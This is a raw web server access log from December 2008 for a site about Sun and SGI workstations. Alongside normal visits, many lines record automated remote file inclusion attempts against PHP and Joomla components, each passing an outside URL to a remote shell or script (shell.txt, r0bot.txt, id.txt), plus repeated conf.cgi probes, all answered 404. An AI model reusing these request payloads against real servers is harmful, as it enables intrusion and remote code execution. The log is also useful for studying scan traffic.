209.200.250.85 - - [14/Dec/2008:04:07:07 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 250
209.200.250.85 - - [14/Dec/2008:04:07:16 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 250
194.8.75.103 - - [14/Dec/2008:04:07:16 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.103 - - [14/Dec/2008:04:07:19 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.103 - - [14/Dec/2008:04:07:20 -0500] "GET /conf/ HTTP/1.0" 200 47
194.8.75.175 - - [14/Dec/2008:04:07:24 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:04:07:25 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:04:07:25 -0500] "GET /conf/ HTTP/1.0" 200 47
83.5.143.230 - - [14/Dec/2008:04:07:37 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
83.5.143.230 - - [14/Dec/2008:04:07:37 -0500] "GET / HTTP/1.0" 200 12547
83.5.143.230 - - [14/Dec/2008:04:07:39 -0500] "GET /conf/ HTTP/1.0" 200 47
194.8.75.107 - - [14/Dec/2008:04:09:06 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.107 - - [14/Dec/2008:04:09:06 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.107 - - [14/Dec/2008:04:09:07 -0500] "GET /conf/ HTTP/1.0" 200 47
209.200.250.85 - - [14/Dec/2008:04:10:26 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 250
209.200.250.85 - - [14/Dec/2008:04:10:26 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 250
92.48.203.116 - - [14/Dec/2008:04:10:28 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
210.196.98.51 - - [14/Dec/2008:04:10:52 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
219.18.77.49 - - [14/Dec/2008:04:10:56 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
76.76.100.2 - - [14/Dec/2008:04:10:59 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
218.239.45.181 - - [14/Dec/2008:04:11:17 -0500] "GET /logs/access_log.4//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 289
218.239.45.181 - - [14/Dec/2008:04:11:18 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 271
218.239.45.181 - - [14/Dec/2008:04:11:19 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 276
222.236.47.182 - - [14/Dec/2008:04:12:44 -0500] "GET /logs/access_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 262
222.236.47.182 - - [14/Dec/2008:04:12:45 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
222.236.47.182 - - [14/Dec/2008:04:12:46 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
205.234.98.254 - - [14/Dec/2008:04:12:54 -0500] "GET /logs/error_log.2/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 277
205.234.98.254 - - [14/Dec/2008:04:12:54 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 260
205.234.98.254 - - [14/Dec/2008:04:12:54 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 265
205.234.98.254 - - [14/Dec/2008:04:12:55 -0500] "GET /logs/error_log.2/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 277
205.234.98.254 - - [14/Dec/2008:04:12:55 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 260
205.234.98.254 - - [14/Dec/2008:04:12:55 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 265
222.236.47.182 - - [14/Dec/2008:04:13:24 -0500] "GET /logs/access_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 262
222.236.47.182 - - [14/Dec/2008:04:13:25 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
222.236.47.182 - - [14/Dec/2008:04:13:26 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
61.247.222.55 - - [14/Dec/2008:04:13:56 -0500] "GET /robots.txt HTTP/1.1" 404 216
61.247.222.55 - - [14/Dec/2008:04:13:56 -0500] "GET /sun_ipx/ipx_guts.jpg HTTP/1.1" 200 33096
66.199.235.58 - - [14/Dec/2008:04:14:07 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:04:14:29 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:04:14:32 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:04:14:33 -0500] "GET /conf/ HTTP/1.0" 200 47
62.101.68.240 - - [14/Dec/2008:04:15:26 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 271
209.135.140.145 - - [14/Dec/2008:04:15:32 -0500] "GET /logs/error_log.4//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 258
209.135.140.145 - - [14/Dec/2008:04:15:32 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 241
209.135.140.145 - - [14/Dec/2008:04:15:34 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 246
209.135.140.145 - - [14/Dec/2008:04:15:39 -0500] "GET /logs/error_log.4//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 258
209.135.140.145 - - [14/Dec/2008:04:15:40 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 246
209.135.140.145 - - [14/Dec/2008:04:15:44 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tos-belarus.org/data/v7id.txt??? HTTP/1.1" 404 241
194.8.75.103 - - [14/Dec/2008:04:16:14 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.103 - - [14/Dec/2008:04:16:14 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.103 - - [14/Dec/2008:04:16:16 -0500] "GET /conf/ HTTP/1.0" 200 47
218.38.34.115 - - [14/Dec/2008:04:16:42 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 261
218.38.34.115 - - [14/Dec/2008:04:16:42 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 266
218.38.34.115 - - [14/Dec/2008:04:16:43 -0500] "GET /logs/access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 279
218.38.34.115 - - [14/Dec/2008:04:16:45 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 266
218.38.34.115 - - [14/Dec/2008:04:16:45 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 261
218.38.34.115 - - [14/Dec/2008:04:16:46 -0500] "GET /logs/access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 279
121.162.85.6 - - [14/Dec/2008:04:16:49 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 261
121.162.85.6 - - [14/Dec/2008:04:16:50 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 266
121.162.85.6 - - [14/Dec/2008:04:16:52 -0500] "GET /logs/access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 279
121.162.85.6 - - [14/Dec/2008:04:16:52 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 261
121.162.85.6 - - [14/Dec/2008:04:16:52 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 266
121.162.85.6 - - [14/Dec/2008:04:16:53 -0500] "GET /logs/access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 279
218.239.45.181 - - [14/Dec/2008:04:18:10 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 271
84.16.242.93 - - [14/Dec/2008:04:18:17 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
200.27.116.182 - - [14/Dec/2008:04:18:36 -0500] "GET /logs/error_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 261
200.27.116.182 - - [14/Dec/2008:04:18:36 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
72.30.79.36 - - [14/Dec/2008:04:18:42 -0500] "GET /docs/vim-common-5.4/scripts.vim HTTP/1.0" 200 3765
200.27.116.182 - - [14/Dec/2008:04:18:43 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
209.200.250.85 - - [14/Dec/2008:04:19:22 -0500] "GET /logs/access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 268
209.200.250.85 - - [14/Dec/2008:04:19:22 -0500] "GET /logs/access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 268
209.200.250.85 - - [14/Dec/2008:04:19:22 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 255
209.200.250.85 - - [14/Dec/2008:04:19:22 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 255
200.27.116.182 - - [14/Dec/2008:04:19:32 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 260
66.199.253.186 - - [14/Dec/2008:04:19:38 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
151.1.32.20 - - [14/Dec/2008:04:20:02 -0500] "GET /logs/error_log.3//components/com_calendar.php?absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistcmd.txt??? HTTP/1.1" 404 251
216.180.251.146 - - [14/Dec/2008:04:20:06 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 266
216.180.251.146 - - [14/Dec/2008:04:20:06 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 261
216.180.251.146 - - [14/Dec/2008:04:20:08 -0500] "GET /logs/access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 279
80.55.171.90 - - [14/Dec/2008:04:21:05 -0500] "GET /logs/access_log.3%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 235
66.249.73.212 - - [14/Dec/2008:04:21:10 -0500] "GET /sunFAQ/faq_framebuffer/framebuffer.html HTTP/1.1" 304 -
80.55.171.90 - - [14/Dec/2008:04:21:12 -0500] "GET /logs/access_log.1%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 235
62.101.68.240 - - [14/Dec/2008:04:21:22 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 271
216.180.251.146 - - [14/Dec/2008:04:22:09 -0500] "GET /logs/access_log.4//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 279
216.180.251.146 - - [14/Dec/2008:04:22:09 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 261
216.180.251.146 - - [14/Dec/2008:04:22:09 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 266
66.235.124.132 - - [14/Dec/2008:04:23:41 -0500] "GET /robots.txt HTTP/1.1" 404 216
66.235.124.132 - - [14/Dec/2008:04:23:42 -0500] "GET /sun_ipc/ HTTP/1.1" 200 9825
66.235.124.132 - - [14/Dec/2008:04:23:42 -0500] "GET /sun_ipc/ipc_lit.jpg HTTP/1.1" 200 8561
66.235.124.132 - - [14/Dec/2008:04:23:42 -0500] "GET /sun_ipc/IPC_led.jpg HTTP/1.1" 200 2197
66.235.124.132 - - [14/Dec/2008:04:23:42 -0500] "GET /sun_ipc/ipc_fan.jpg HTTP/1.1" 200 17604
66.235.124.132 - - [14/Dec/2008:04:23:42 -0500] "GET /sun_ipc/ipc_open.jpg HTTP/1.1" 200 19067
66.235.124.132 - - [14/Dec/2008:04:23:42 -0500] "GET /sun_ipc/sun4_40.gif HTTP/1.1" 200 6192
77.221.130.16 - - [14/Dec/2008:04:24:03 -0500] "GET ///cms/system/openengine.php?oe_classpath=http://teksten-woorden.nl/test.txt?? HTTP/1.1" 404 233
77.221.130.16 - - [14/Dec/2008:04:24:03 -0500] "GET /logs///cms/system/openengine.php?oe_classpath=http://teksten-woorden.nl/test.txt?? HTTP/1.1" 404 238
89.111.176.98 - - [14/Dec/2008:04:24:55 -0500] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.becabioinfo.org/bbrweb//contenido/cronjobs/idrfi.txt?? HTTP/1.1" 404 216
70.48.12.225 - - [14/Dec/2008:04:25:27 -0500] "GET //resources/includes/class.Smarty.php?cfg[sys][base_path]=http://teksten-woorden.nl/test.txt?? HTTP/1.1" 404 242
70.48.12.225 - - [14/Dec/2008:04:25:27 -0500] "GET /logs//resources/includes/class.Smarty.php?cfg[sys][base_path]=http://teksten-woorden.nl/test.txt?? HTTP/1.1" 404 247
209.200.250.85 - - [14/Dec/2008:04:25:37 -0500] "GET /logs/error_log.3/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 267
209.200.250.85 - - [14/Dec/2008:04:25:37 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 255
209.200.250.85 - - [14/Dec/2008:04:25:55 -0500] "GET /logs/error_log.3/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 267
209.200.250.85 - - [14/Dec/2008:04:25:55 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://geocities.com/respatikarel/shell.txt?? HTTP/1.1" 404 255
218.114.186.57 - - [14/Dec/2008:04:25:58 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
24.187.36.216 - - [14/Dec/2008:04:26:03 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
200.27.116.182 - - [14/Dec/2008:04:26:18 -0500] "GET /logs/access_log.4/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 278
200.27.116.182 - - [14/Dec/2008:04:26:18 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 260
200.27.116.182 - - [14/Dec/2008:04:26:18 -0500] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 265
92.48.203.116 - - [14/Dec/2008:04:26:46 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
216.29.152.112 - - [14/Dec/2008:04:26:53 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 255
216.29.152.112 - - [14/Dec/2008:04:26:54 -0500] "GET /logs/access_log.2//components/com_simpleboard/image_upload.php?sbp=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 268
131.107.0.111 - - [14/Dec/2008:04:26:56 -0500] "GET /robot.txt HTTP/1.1" 404 215
131.107.0.111 - - [14/Dec/2008:04:26:56 -0500] "GET /robots.txt HTTP/1.1" 404 216
83.216.102.153 - - [14/Dec/2008:04:27:44 -0500] "GET /~techrat/vw_spotters/ HTTP/1.1" 200 5450
64.18.142.194 - - [14/Dec/2008:04:27:46 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 221
64.18.142.194 - - [14/Dec/2008:04:27:46 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 216
218.237.66.210 - - [14/Dec/2008:04:27:47 -0500] "GET /logs/access_log.2//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 234
218.237.66.210 - - [14/Dec/2008:04:27:48 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 216
218.237.66.210 - - [14/Dec/2008:04:27:48 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 221
83.216.102.153 - - [14/Dec/2008:04:27:55 -0500] "GET /~techrat/vw_spotters/vw_beetle_f.jpg HTTP/1.1" 200 28153
83.216.102.153 - - [14/Dec/2008:04:27:56 -0500] "GET /~techrat/vw_spotters/vw_ghia_f.jpg HTTP/1.1" 200 22868
83.216.102.153 - - [14/Dec/2008:04:27:57 -0500] "GET /~techrat/vw_spotters/vw_beetle_r.jpg HTTP/1.1" 200 30774
83.216.102.153 - - [14/Dec/2008:04:27:57 -0500] "GET /~techrat/vw_spotters/vw_ghia_r.jpg HTTP/1.1" 200 13377
83.216.102.153 - - [14/Dec/2008:04:27:57 -0500] "GET /~techrat/vw_spotters/vw_thing_f.jpg HTTP/1.1" 200 23902
83.216.102.153 - - [14/Dec/2008:04:27:57 -0500] "GET /~techrat/vw_spotters/vw_thing_r.jpg HTTP/1.1" 200 16248
83.216.102.153 - - [14/Dec/2008:04:27:58 -0500] "GET /~techrat/vw_spotters/vw_bus_f.jpg HTTP/1.1" 200 37505
83.216.102.153 - - [14/Dec/2008:04:27:58 -0500] "GET /~techrat/vw_spotters/vw_fast_f.jpg HTTP/1.1" 200 17997
83.216.102.153 - - [14/Dec/2008:04:27:58 -0500] "GET /~techrat/vw_spotters/vw_fast_r.jpg HTTP/1.1" 200 23628
83.216.102.153 - - [14/Dec/2008:04:27:59 -0500] "GET /~techrat/vw_spotters/vw_notch_f.jpg HTTP/1.1" 200 22171
83.216.102.153 - - [14/Dec/2008:04:28:00 -0500] "GET /~techrat/vw_spotters/vw_square_f.jpg HTTP/1.1" 200 18473
83.216.102.153 - - [14/Dec/2008:04:28:01 -0500] "GET /~techrat/vw_spotters/vw_square_r.jpg HTTP/1.1" 200 26555
83.216.102.153 - - [14/Dec/2008:04:28:01 -0500] "GET /~techrat/vw_spotters/vw_notch_r.jpg HTTP/1.1" 200 20478
83.216.102.153 - - [14/Dec/2008:04:28:01 -0500] "GET /~techrat/vw_spotters/vw_411_f.jpg HTTP/1.1" 200 22814
83.216.102.153 - - [14/Dec/2008:04:28:02 -0500] "GET /~techrat/vw_spotters/vw_411_wagen_f.jpg HTTP/1.1" 200 15909
83.216.102.153 - - [14/Dec/2008:04:28:02 -0500] "GET /~techrat/vw_spotters/vw_412_cool.jpg HTTP/1.1" 200 15107
200.27.116.182 - - [14/Dec/2008:04:28:02 -0500] "GET /logs/access_log.4/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 278
83.216.102.153 - - [14/Dec/2008:04:28:02 -0500] "GET /~techrat/vw_spotters/vw_412_f.jpg HTTP/1.1" 200 11806
83.216.102.153 - - [14/Dec/2008:04:28:08 -0500] "GET /~techrat/vw_spotters/vw_bus_f.jpg HTTP/1.1" 304 -
200.27.116.182 - - [14/Dec/2008:04:28:09 -0500] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 260
83.216.102.153 - - [14/Dec/2008:04:28:11 -0500] "GET /favicon.ico HTTP/1.1" 200 318
216.29.152.112 - - [14/Dec/2008:04:28:13 -0500] "GET /logs/access_log.4//components/com_simpleboard/image_upload.php?sbp=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 268
216.29.152.112 - - [14/Dec/2008:04:28:13 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 255
72.30.79.36 - - [14/Dec/2008:04:28:25 -0500] "GET /sunFAQ/faq_hardware/hwref4.html HTTP/1.0" 200 40349
65.55.25.136 - - [14/Dec/2008:04:28:45 -0500] "GET /sunFAQ/faq_nvram.html HTTP/1.1" 304 -
194.165.42.59 - - [14/Dec/2008:04:28:46 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
194.8.74.11 - - [14/Dec/2008:04:28:46 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.74.11 - - [14/Dec/2008:04:28:46 -0500] "GET / HTTP/1.0" 200 12547
194.8.74.11 - - [14/Dec/2008:04:28:47 -0500] "GET /conf/ HTTP/1.0" 200 47
64.18.142.194 - - [14/Dec/2008:04:29:13 -0500] "GET /logs/access_log.2%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://uploader.ws/upload/200812/FX29ID1.txt?? HTTP/1.1" 404 236
220.181.32.22 - - [14/Dec/2008:04:29:45 -0500] "GET / HTTP/1.1" 200 12547
218.180.60.101 - - [14/Dec/2008:04:30:33 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
218.239.45.181 - - [14/Dec/2008:04:30:34 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 271
68.192.166.141 - - [14/Dec/2008:04:30:35 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
67.195.37.153 - - [14/Dec/2008:04:30:38 -0500] "GET /sunFAQ/faq_framebuffer/fbfaq_files/fbinfo HTTP/1.0" 304 -
212.116.219.81 - - [14/Dec/2008:04:30:48 -0500] "GET /sun_ipx/webserver.html HTTP/1.1" 200 13049
212.116.219.81 - - [14/Dec/2008:04:30:50 -0500] "GET /favicon.ico HTTP/1.1" 200 318
72.30.79.36 - - [14/Dec/2008:04:31:40 -0500] "GET /docs/rpm-3.0.3/?M=D HTTP/1.0" 200 2380
194.8.74.10 - - [14/Dec/2008:04:32:44 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.74.10 - - [14/Dec/2008:04:32:44 -0500] "GET / HTTP/1.0" 200 12547
194.8.74.10 - - [14/Dec/2008:04:32:45 -0500] "GET /conf/ HTTP/1.0" 200 47
194.8.74.10 - - [14/Dec/2008:04:33:07 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.74.10 - - [14/Dec/2008:04:33:08 -0500] "GET / HTTP/1.0" 200 12547
194.8.74.10 - - [14/Dec/2008:04:33:08 -0500] "GET /conf/ HTTP/1.0" 200 47
90.206.6.86 - - [14/Dec/2008:04:33:19 -0500] "GET /sunPICS/ HTTP/1.1" 200 17863
90.206.6.86 - - [14/Dec/2008:04:33:19 -0500] "GET /images/logo_small.gif HTTP/1.1" 200 4441
90.206.6.86 - - [14/Dec/2008:04:33:20 -0500] "GET /favicon.ico HTTP/1.1" 200 318
90.206.6.86 - - [14/Dec/2008:04:33:27 -0500] "GET /sunPICS/sun3/3_260_front.jpg HTTP/1.1" 200 27929
91.103.152.252 - - [14/Dec/2008:04:33:32 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
91.103.152.252 - - [14/Dec/2008:04:33:32 -0500] "GET / HTTP/1.0" 200 12547
91.103.152.252 - - [14/Dec/2008:04:33:37 -0500] "GET /conf/ HTTP/1.0" 200 47
61.135.168.39 - - [14/Dec/2008:04:33:51 -0500] "GET / HTTP/1.1" 200 12547
71.201.204.212 - - [14/Dec/2008:04:34:26 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
70.245.31.87 - - [14/Dec/2008:04:34:33 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
65.55.25.136 - - [14/Dec/2008:04:35:00 -0500] "GET /sun_ipx/ HTTP/1.1" 304 -
200.27.116.182 - - [14/Dec/2008:04:35:28 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
65.55.232.13 - - [14/Dec/2008:04:35:32 -0500] "GET /robots.txt HTTP/1.1" 404 216
65.55.232.13 - - [14/Dec/2008:04:35:32 -0500] "GET /bookmarks_public.html HTTP/1.1" 304 -
66.249.73.212 - - [14/Dec/2008:04:35:43 -0500] "GET /sgi_indigo2/i2_top_rear.jpg HTTP/1.1" 304 -
212.123.91.61 - - [14/Dec/2008:04:35:57 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
72.233.113.66 - - [14/Dec/2008:04:35:59 -0500] "GET / HTTP/1.1" 200 12547
85.18.227.229 - - [14/Dec/2008:04:36:17 -0500] "GET /favicon.ico HTTP/1.1" 200 318
85.18.227.229 - - [14/Dec/2008:04:36:17 -0500] "GET /sunFAQ/faq_framebuffer/fbfaq_files/FAQ.gif HTTP/1.1" 200 910
85.18.227.229 - - [14/Dec/2008:04:36:18 -0500] "GET /sunFAQ/faq_framebuffer/framebuffer.html HTTP/1.1" 200 105424
71.201.127.82 - - [14/Dec/2008:04:36:43 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
218.38.34.115 - - [14/Dec/2008:04:36:49 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
218.38.34.115 - - [14/Dec/2008:04:36:49 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
218.38.34.115 - - [14/Dec/2008:04:36:49 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
65.55.232.13 - - [14/Dec/2008:04:36:53 -0500] "GET /apache/ HTTP/1.1" 304 -
